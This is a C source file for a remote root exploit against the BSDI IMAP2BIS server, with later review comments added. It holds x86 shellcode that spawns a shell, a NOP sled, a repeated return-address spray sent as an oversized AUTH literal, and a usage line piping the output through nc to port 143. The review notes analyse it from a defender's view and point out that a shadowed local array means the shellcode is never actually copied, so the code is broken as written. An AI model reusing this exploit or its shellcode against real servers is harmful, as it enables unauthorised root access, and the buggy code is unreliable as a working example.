/* BSDI IMAP2BIS remote root exploit
   Usage: (./imapx <offset>;cat)| nc targethost 143
   where offset = -1000..1000 (brute force if 0 doesnt work)
   Note: if you plan to port this to other OS., make sure the shellcode
   doesn't contain lower case chars since imapd will toupper() the
   shellcode, thus fucking it up.
   Note: I tested this on a few system's and found this offsets vulnerable */

/*
 * Review notes (historical listing, kept as documented):
 *  - The program does no networking itself: it only builds one IMAP command
 *    (a "{n} AUTH" literal announcement followed by n raw bytes) and writes
 *    it to stdout; the usage line above pipes that through nc.
 *  - From a defender's view the observable artefact is therefore a single
 *    oversized AUTH literal whose body is almost entirely 0x90 bytes.
 *  - Several constructs below are undefined or non-portable C (void main,
 *    unchecked argv, shadowed array, type-punned unaligned stores); they are
 *    noted inline and left unchanged.
 */

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>   /* nothing from this header is used below */
#include <string.h>

#define BUFLEN 4092   /* size of the literal body sent after "{4092} AUTH" */
#define NOP 0x90      /* x86 one-byte NOP; every byte of buf not written later keeps this value */

/* File-scope payload bytes.
 * NOTE(review): this array is never referenced — main() declares a local
 * array of the same name that shadows it (see below). The trailing bytes are
 * upper-case ASCII, consistent with the toupper() remark in the header. */
char shell[] =
"\xeb\x58\x5e"
"\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
"\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
"\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
"\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
"\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
"\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
"\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"\x42\x49\x4e\x2f\x53\x48\x00";

/* Entry point: builds buf and prints the IMAP command to stdout.
 * argv[1] is read as a decimal integer and added to a fixed base value.
 * Non-standard signature (void main); the trailing `return;` yields no
 * defined exit status. */
void main (int argc, char *argv[])
{
    char buf[BUFLEN];          /* literal body written to stdout, byte for byte */
    int offset,nop,i;
    unsigned long esp;         /* base value stamped repeatedly into buf by the loop */
    char shell[1024+300];      /* shadows the file-scope shell[]; never initialised */

    /* Printed unconditionally; argc is never checked, so running without an
     * argument makes argv[1] NULL and the atoi() below undefined behaviour. */
    fprintf(stderr,"usage: %s <offset>\n", argv[0]);

    nop = 403;                 /* byte index in buf at which the copy below is placed */
    esp = 0xefbfd5e8;          /* hard-coded base value; argv[1] adjusts it */
    offset = atoi(argv[1]);    /* atoi: no range or format checking */

    memset(buf, NOP, BUFLEN);  /* every byte of buf starts out as NOP */

    /* `shell` here names the uninitialised local array, not the file-scope one:
     * strlen() reads indeterminate bytes (UB) and the copy length is
     * unpredictable. */
    memcpy(buf+(long)nop, shell, strlen(shell));

    /* 4-byte stores at every second byte from index 1024 up to 4088 (the last
     * store ends exactly at BUFLEN-1): the stores overlap, are unaligned, and
     * type-pun a char array through int* (strict-aliasing UB; may fault on
     * alignment-strict targets). The unsigned long -> int conversion is
     * implementation-defined when the value does not fit. */
    for (i = 1024; i < BUFLEN - 3; i += 2) {
        *((int *) &buf[i]) = esp + (long) offset;
        /* Loop-invariant: zeroes the last byte of the local array on every
         * iteration. It runs after the memcpy, so it has no effect on buf. */
        shell[ sizeof(shell)-1 ] = 0;
    }

    /* IMAP literal syntax: "{n}" announces that n raw bytes follow. */
    printf("{%d} AUTH\r\n", BUFLEN);
    for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);       /* raw bytes, including NUL and non-ASCII values */
    printf("\r\n");
    return;                    /* void main: no exit status is returned */
}